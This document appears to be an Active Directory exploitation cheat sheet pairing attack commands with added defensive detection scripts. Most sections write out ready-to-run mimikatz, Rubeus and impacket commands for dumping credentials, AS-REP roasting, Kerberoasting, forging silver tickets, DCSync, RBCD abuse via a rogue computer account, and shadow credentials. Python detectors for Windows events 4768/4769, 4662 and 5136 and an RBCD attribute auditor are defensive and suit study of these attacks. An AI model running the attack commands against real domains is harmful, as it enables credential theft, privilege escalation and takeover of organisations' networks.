# ⚔️ AD Exploitation

## Basic Kerberos Authentication

```mermaid
sequenceDiagram
    participant C as Client
    participant AS as Authentication Server
    participant TGS as Ticket Granting Server
    participant S as Service
    C->>AS: AS-REQ (with credentials)
    AS-->>C: AS-REP (TGT, Session Key for TGS)
    Note right of C: Stores TGT and session key to talk with TGS
    C->>TGS: TGS-REQ (TGT, Authenticator, SPN of Service)
    TGS-->>C: TGS-REP (Service Ticket, Session Key for Service)
    Note right of C: Now has a ticket & session key to talk with Service
    C->>S: AP-REQ (Service Ticket, Authenticator)
```
## Dumping Cached AD Credentials

> **Info:** SYSTEM privileges are needed

```bash
# linux
impacket-secretsdump -target-ip <target_ip> <domain>/<user>:<pass>@<target_ip>
```

```powershell
# win
.\mimikatz.exe
privilege::debug
# dump cached NTLM hashes on the current system
sekurlsa::logonpasswords
# dump tickets
sekurlsa::tickets
# one-liner
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
```
## AS-REP Roasting

Attack that targets accounts with "Do not require Kerberos preauthentication" enabled: the KDC hands out an AS-REP for such an account without any proof of the password, and the encrypted part of that reply (encrypted with a key derived from the user's password, i.e. the NTLM hash when RC4 is used) can be cracked offline to recover the password.

```mermaid
sequenceDiagram
    participant Attacker
    participant KDC
    Attacker->>KDC: AS-REQ (Username, "Pre-Authentication Not Required")
    activate KDC
    KDC-->>Attacker: AS-REP (TGT encrypted with user's NTLM hash)
    deactivate KDC
    Attacker->>Attacker: Offline Cracking (Attempt to crack TGT to reveal NTLM hash)
```

> **Info:** 🐈⬛ Hashcat mode -> 18200

```bash
# linux
impacket-GetNPUsers <domain>/ -dc-ip <ip> -request -no-pass -usersfile <valid_users>
kerbrute userenum -d <domain> --dc <ip> <valid_users>
```

```powershell
# windows
.\Rubeus.exe asreproast /nowrap
```
## Kerberoasting

Attack that targets service accounts: any authenticated domain user can request a service ticket for an account's SPN, and the ticket (encrypted with the service account's key) is then cracked offline to recover the service account's password.

```mermaid
sequenceDiagram
    participant Attacker
    participant KDC
    participant Service
    Attacker->>KDC: AS-REQ (Valid User Credentials)
    activate KDC
    KDC-->>Attacker: AS-REP (TGT)
    deactivate KDC
    Attacker->>KDC: TGS-REQ (TGT, SPN of target service)
    activate KDC
    KDC-->>Attacker: TGS-REP (Service Ticket encrypted with service account's password)
    deactivate KDC
    Attacker->>Attacker: Offline Cracking (Attempt to crack service ticket)
    Attacker->>Service: AP-REQ (Service Ticket, Authenticator)
    activate Service
    Service-->>Attacker: Access Granted
    deactivate Service
```

> **Info:** 🐈⬛ Hashcat mode -> 13100

```bash
# sync local time with the DC if you get a clock skew error
ntpdate <dc_ip>
impacket-GetUserSPNs -request -dc-ip <ip> <domain>/<user>
```

```powershell
# windows
.\Rubeus.exe kerberoast /simple
```
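On the defensive side, both of the roasting techniques above leave a trace on the domain controller: AS-REP roasting shows up as a 4768 (TGT requested) with a pre-authentication type of 0, and Kerberoasting as a burst of 4769 (service ticket requested) events from one client for several non-computer service accounts, typically with RC4 (0x17) encryption because that is what hashcat modes 18200 and 13100 crack fastest. The detection logic below is an added example written for this page, not code from any tool mentioned here; the event records are constructed dicts whose keys follow the 4768/4769 field names, and the window and threshold are assumptions to tune per environment.

```python
"""Flag AS-REP roasting (4768) and Kerberoasting (4769) candidates from Windows Security events.
Added example; sample events below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC, the cracker-friendly etype

# Constructed sample records; keys mirror the Windows 4768/4769 event fields.
SAMPLE_EVENTS = [
    {"EventID": 4768, "Time": "2024-05-01T10:00:00", "TargetUserName": "svc_backup",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4768, "Time": "2024-05-01T10:00:01", "TargetUserName": "alice",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.20", "Status": "0x0"},
    # one client asks for RC4 service tickets for three SPN accounts within seconds
    {"EventID": 4769, "Time": "2024-05-01T10:05:00", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-05-01T10:05:01", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-05-01T10:05:02", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_iis", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": "0x0"},
    # benign: AES tickets for a computer account and for krbtgt (TGT renewal)
    {"EventID": 4769, "Time": "2024-05-01T10:06:00", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.20", "Status": "0x0"},
    {"EventID": 4769, "Time": "2024-05-01T10:06:01", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.20", "Status": "0x0"},
]


def asrep_roast_candidates(events):
    """Accounts that received a TGT without pre-authentication (PreAuthType 0 on a successful 4768).
    Any such account is roastable; an RC4 etype just makes cracking cheaper."""
    return [e["TargetUserName"] for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == "0" and e["Status"] == "0x0"]


def kerberoast_candidates(events, window=timedelta(minutes=5), threshold=3):
    """Group successful RC4 4769s for user (non-$) service accounts by requesting client;
    report a client that touches >= threshold distinct services inside the window."""
    by_client = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        svc = e["ServiceName"]
        # computer accounts have long random passwords and krbtgt is TGT renewal: not roast targets
        if e["TicketEncryptionType"] != RC4_HMAC or svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_client[e["IpAddress"]].append((datetime.fromisoformat(e["Time"]), svc))

    alerts = {}
    for ip, reqs in by_client.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window starting at each request
            spns = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(spns) >= threshold:
                alerts[ip] = sorted(spns)
                break
    return alerts


if __name__ == "__main__":
    print("AS-REP roast candidates:", asrep_roast_candidates(SAMPLE_EVENTS))
    print("Kerberoast bursts:", kerberoast_candidates(SAMPLE_EVENTS))
```

The RC4 filter is a heuristic rather than a rule: Rubeus and GetUserSPNs ask for RC4 by default, but an attacker can request AES tickets (hashcat 19600/19700), so a high-fidelity version of this check keys on the burst of distinct SPNs per client and treats the etype as a severity booster.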
### TargetedKerberoast

This tool abuses write permission (such as GenericWrite) on the `servicePrincipalName` attribute to set a temporary SPN on users that have none, making them Kerberoastable, and then requests and removes the SPN again.
## Silver Ticket

A Silver Ticket is a forged Kerberos Ticket Granting Service (TGS) ticket that gives an attacker access to a specific service without requesting a ticket from the Key Distribution Center (KDC) after the initial authentication. The service host validates the ticket with the service account's key alone, so the KDC is never contacted and no TGS request is logged on the domain controller; the forged ticket is only visible on the service host itself.

```mermaid
sequenceDiagram
    participant Attacker
    participant Target Service
    Attacker->>Attacker: Extracts NTLM hash of Service Account
    Attacker->>Attacker: Creates forged TGS (Silver Ticket)
    Attacker->>Target Service: Forged AP-REQ (Sends forged TGS to access service)
    Target Service-->>Attacker: AP-REP (Grants unauthorized access)
```

Three pieces of information are needed:

- SPN password hash
- Domain SID
- Target SPN
### Windows

```powershell
# SPN hash
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
# domain SID
whoami /user
# take everything except the last part; only the domain SID, not the user RID
# target SPN
setspn -L <account_name>
# forge the ticket
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
exit
# show saved tickets
klist
# access the service
iwr -UseDefaultCredentials <servicename>://<computername>
```
### Linux

```bash
# SPN hash (NT hash = MD4 over the UTF-16LE password)
echo -n 'password' | iconv -t utf16le | openssl dgst -md4
# on OpenSSL 3.x MD4 lives in the legacy provider: openssl dgst -md4 -provider legacy
# domain SID
impacket-getPac <domain>/<user>:<pass> -targetUser Administrator
# target SPN (shows up in the GetUserSPNs output)
# forge the ticket
impacket-ticketer -nthash <hash> -domain-sid <sid> -domain <domain> -spn <spn> <user>
# export the ticket
export KRB5CCNAME=<ticket>.ccache
# show saved tickets
klist
# access the target
impacket-psexec <domain>/<user>@<target> -k -no-pass
```
## DCSync

DCSync is an attack in which an account with sufficient privileges requests password hashes and other secrets directly from a domain controller over the directory replication protocol (DRSUAPI), mimicking a legitimate domain controller replicating data.

The user needs the following permissions (Domain Admins, Enterprise Admins and the DC computer accounts hold them by default):

- Replicating Directory Changes
- Replicating Directory Changes All
- Replicating Directory Changes in Filtered Set

> **Info:** 🐈⬛ Hashcat mode -> 1000

```bash
# linux
impacket-secretsdump -just-dc-user <target_user> <domain>/<user>:<pass>@<dc_ip>
```

```powershell
# windows
.\mimikatz.exe
lsadump::dcsync /user:<domain>\<user>
# one-liner
.\mimikatz.exe "lsadump::dcsync /user:<domain>\<user>" "exit"
```
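Because DCSync exercises the three replication rights listed above, it is detectable with Directory Service Access auditing: the DC logs a 4662 whose `Properties` field contains the control-access GUIDs for those rights, and the only subjects that should ever trigger it are other domain controllers (and, in hybrid setups, the Entra/Azure AD Connect account). The detector below is an added example for this page, not code from impacket or mimikatz; the rights GUIDs are the real schema values, the event records are constructed, and the DC allowlist is an assumption you would populate from your own environment.

```python
"""Detect DCSync-style replication requests from event 4662 records.
Added example; sample records are constructed."""

# Control-access right GUIDs as they appear in the 4662 Properties field.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS: the access-mask bit extended rights are checked under

# Constructed sample 4662 records. The leading "%%7688" in Properties is the
# resource string the event uses for "Control Access" before the GUID list.
SAMPLE_4662 = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "ObjectName": "DC=corp,DC=com",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jeffadmin", "AccessMask": "0x100",
     "ObjectName": "DC=corp,DC=com",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # ordinary attribute read: no control-access bit, placeholder property GUID
    {"EventID": 4662, "SubjectUserName": "alice", "AccessMask": "0x10",
     "ObjectName": "CN=alice,CN=Users,DC=corp,DC=com",
     "Properties": "%%7684\n\t{00000000-0000-0000-0000-000000000000}"},
]


def replication_rights_used(record):
    """Return the names of replication rights exercised by one 4662 record (empty set if none)."""
    if record.get("EventID") != 4662:
        return set()
    if int(record.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
        return set()
    tokens = record.get("Properties", "").split()          # splits on newlines/tabs/spaces
    guids = {t.strip("{}").lower() for t in tokens}        # "%%7688" simply never matches
    return {REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS}


def dcsync_alerts(records, dc_accounts):
    """Replication by anything other than an allowlisted DC computer account is an alert."""
    allow = {a.upper() for a in dc_accounts}
    alerts = []
    for r in records:
        rights = replication_rights_used(r)
        if not rights or r["SubjectUserName"].upper() in allow:
            continue
        alerts.append({"subject": r["SubjectUserName"], "object": r.get("ObjectName"),
                       "rights": sorted(rights)})
    return alerts


if __name__ == "__main__":
    for a in dcsync_alerts(SAMPLE_4662, dc_accounts=["DC01$", "DC02$"]):  # assumed DC names
        print("DCSync suspected:", a)
```

Get-Changes on its own is also held by some legitimate tooling, so a quieter variant alerts only when Get-Changes-All (the right that releases secret attributes) is present; the sample keeps both so that the full picture is visible.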
## RBCD (Resource-Based Constrained Delegation)

Resource-Based Constrained Delegation abuse: an attacker with write access to a computer object's delegation attribute (`msDS-AllowedToActOnBehalfOfOtherIdentity`) can allow a principal they control to impersonate any user to that computer, enabling privilege escalation or lateral movement.

Tooling: https://github.com/tothi/rbcd-attack (can be run from outside the domain)

```bash
# Create a new computer account (uses the default MachineAccountQuota)
impacket-addcomputer <domain>/<user> -computer-name 'evilcomputer$' -computer-pass 'ev1lP@sS' -dc-ip <ip> -hashes :<hash>
# Add a security descriptor for the newly created EVILCOMPUTER to the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target computer
python rbcd.py -f EVILCOMPUTER -t <computer> -dc-ip <ip> <domain>\\<user> -hashes :<hash>
python rbcd.py -f EVILCOMPUTER -t <computer> -dc-ip <ip> '<domain>\<user>:<password>'
# Fetch a CIFS service ticket on behalf of the targeted domain user (administrator) and store it in administrator@cifs_<computer>.<domain>@<DOMAIN>.ccache
impacket-getST -spn cifs/<computer>.<domain> -impersonate administrator -dc-ip <ip> '<domain>/EVILCOMPUTER$:ev1lP@sS'
# Export the ticket and access the computer as administrator
export KRB5CCNAME=administrator@cifs_<computer>.<domain>@<DOMAIN>.ccache
impacket-psexec -k -no-pass <domain>/administrator@<computer>.<domain>
```
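The attribute that rbcd.py writes is a binary self-relative security descriptor whose DACL grants the "acting" principal to the target computer, so auditing for RBCD means pulling `msDS-AllowedToActOnBehalfOfOtherIdentity` from every computer object and listing the SIDs in that DACL against the ones you expect. The parser below is an added example for this page, not code from rbcd-attack or impacket: it builds a descriptor with the same layout those tools write (DACL-present, ACL revision 4, one ACCESS_ALLOWED ACE per SID) purely so the example runs offline, then decodes it. The domain SID is the one used elsewhere on this page; the RIDs 1105 and 1601 and the approved list are constructed.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity and report unexpected delegations.
Added example; the descriptor built here is constructed test data."""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL_MASK = 0xF01FF  # generic/standard/specific bits RBCD tooling grants


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID (revision, subauth count, 6-byte big-endian authority, LE subauths)."""
    parts = sid.split("-")
    assert parts[0] == "S" and parts[1] == "1"
    authority, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(buf, off):
    """Decode a binary SID at buf[off:]; returns (sid_string, byte_length)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_descriptor(allowed_sids, owner="S-1-5-32-544"):
    """Constructed SECURITY_DESCRIPTOR_RELATIVE: header, owner, group, then a DACL with
    one ACCESS_ALLOWED_ACE per delegated SID (same shape as the value rbcd.py writes)."""
    aces = b""
    for sid in allowed_sids:
        body = struct.pack("<I", FULL_CONTROL_MASK) + sid_to_bytes(sid)
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0x00, 4 + len(body)) + body
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner_b = sid_to_bytes(owner)
    off_owner = 20                      # header is 20 bytes
    off_group = off_owner + len(owner_b)
    off_dacl = off_group + len(owner_b)
    hdr = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                      off_owner, off_group, 0, off_dacl)
    return hdr + owner_b + owner_b + acl


def allowed_to_act(sd):
    """SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL, i.e. who may act on behalf
    of other identities to this computer."""
    _rev, _sbz, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _acl_rev, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(sd, pos + 8)  # 4-byte ACE header + 4-byte mask precede the SID
            sids.append(sid)
        pos += ace_size
    return sids


def unexpected_delegations(sd, approved):
    """Delegated SIDs that are not on the change-controlled allowlist."""
    return [s for s in allowed_to_act(sd) if s not in approved]


# Constructed scenario: a sanctioned front-end (RID 1105) plus a rogue computer account (RID 1601).
DOMAIN_SID = "S-1-5-21-1987370270-658905905-1781884369"
APPROVED = {DOMAIN_SID + "-1105"}
SAMPLE_SD = build_rbcd_descriptor([DOMAIN_SID + "-1105", DOMAIN_SID + "-1601"])

if __name__ == "__main__":
    print("delegated:", allowed_to_act(SAMPLE_SD))
    print("unexpected:", unexpected_delegations(SAMPLE_SD, APPROVED))
```

In a real sweep the raw attribute comes straight out of LDAP (ldap3 or `Get-ADComputer -Properties msDS-AllowedToActOnBehalfOfOtherIdentity`) and the returned SIDs are resolved to account names; a newly created machine account appearing here, combined with the 4741 (computer account created) for it, is the RBCD chain above seen from the other side.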
## Shadow Credentials

Shadow credentials abuse involves adding an attacker-controlled key pair (a KeyCredential) to a user or computer object, allowing the attacker to authenticate as that principal with a certificate through PKINIT (Kerberos certificate authentication).

Requirements:

- The Domain Controller must have a server authentication digital certificate installed (PKINIT must work).
- Write access to the `msDS-KeyCredentialLink` attribute on the target object.

```bash
# Add a shadow credential to the target user/computer (writes a PFX + password locally)
python pywhisker.py --action add -d <domain> -u <user> -p <pass> --target <target_user> --filename <cert_name>
# Request a TGT as the target using the shadow credential; prints the AS-REP encryption key
python gettgtpkinit.py -cert-pfx <cert_name>.pfx -pfx-pass <pass> <domain>/<target_user> <target_user>.ccache
# Export the ticket for use with other tools
export KRB5CCNAME=<target_user>.ccache
# Get the target user's NTLM hash (PAC U2U trick) with the key printed by gettgtpkinit.py
python getnthash.py -key <key> <domain>/<target_user>
```
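The three attribute-write primitives on this page (an SPN planted on a user for TargetedKerberoast, a delegation descriptor written for RBCD, and a KeyCredential added for shadow credentials) all surface as Directory Service Changes events, 5136, with the attribute's LDAP display name and the subject that wrote it, provided the domain object has a SACL that audits writes. The detector below is an added example for this page, not code from pywhisker, rbcd-attack or targetedKerberoast; the records are constructed, the `%%14674` operation-type string is the real resource id for "Value Added", and the self-write exclusion is a tuning assumption.

```python
"""Alert on 5136 writes to the attributes abused for targeted Kerberoasting, RBCD and
shadow credentials. Added example; sample records are constructed."""

WATCHED = {
    "serviceprincipalname": "targeted Kerberoast: SPN added to a user object",
    "msds-allowedtoactonbehalfofotheridentity": "RBCD: delegation configured on a computer",
    "msds-keycredentiallink": "shadow credentials: key credential added",
}
VALUE_ADDED = "%%14674"  # 5136 OperationType resource string for "Value Added"

# Constructed 5136 records; keys follow the event's field names.
SAMPLE_5136 = [
    {"EventID": 5136, "SubjectUserName": "jeffadmin", "ObjectClass": "user",
     "ObjectDN": "CN=svc_sql,OU=Service Accounts,DC=corp,DC=com",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "HTTP/placeholder.corp.com",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "DC01$", "ObjectClass": "computer",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=corp,DC=com",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "ldap/dc01.corp.com",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "jeffadmin", "ObjectClass": "computer",
     "ObjectDN": "CN=WEB04,CN=Computers,DC=corp,DC=com",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "AttributeValue": "<binary SD>",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "WS01$", "ObjectClass": "computer",
     "ObjectDN": "CN=WS01,CN=Computers,DC=corp,DC=com",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "AttributeValue": "B:828:...",
     "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "jeffadmin", "ObjectClass": "user",
     "ObjectDN": "CN=alice,CN=Users,DC=corp,DC=com",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "AttributeValue": "B:828:...",
     "OperationType": "%%14674"},
]


def object_cn(dn):
    """First RDN value of a DN: 'CN=WEB04,CN=Computers,DC=corp,DC=com' -> 'WEB04'."""
    return dn.split(",")[0].split("=", 1)[1]


def is_self_write(record):
    """A principal updating its own object (e.g. a workstation rotating its own key link)
    is the common legitimate pattern; writes by someone else are the interesting ones."""
    subject = record["SubjectUserName"].rstrip("$").lower()
    return subject == object_cn(record["ObjectDN"]).rstrip("$").lower()


def sensitive_attribute_writes(records):
    alerts = []
    for r in records:
        if r.get("EventID") != 5136 or r.get("OperationType") != VALUE_ADDED:
            continue
        attr = r["AttributeLDAPDisplayName"].lower()
        if attr not in WATCHED:
            continue
        # computers get SPNs all the time; the TargetedKerberoast case is an SPN landing on a user
        if attr == "serviceprincipalname" and r.get("ObjectClass") != "user":
            continue
        if attr == "msds-keycredentiallink" and is_self_write(r):
            continue
        alerts.append({"subject": r["SubjectUserName"], "object": r["ObjectDN"],
                       "attribute": r["AttributeLDAPDisplayName"], "why": WATCHED[attr]})
    return alerts


if __name__ == "__main__":
    for a in sensitive_attribute_writes(SAMPLE_5136):
        print(a)
```

Pairing the SPN alert with a following value-deleted (`%%14675`) on the same object minutes later is the TargetedKerberoast signature specifically, since that tool removes the SPN once the ticket has been collected.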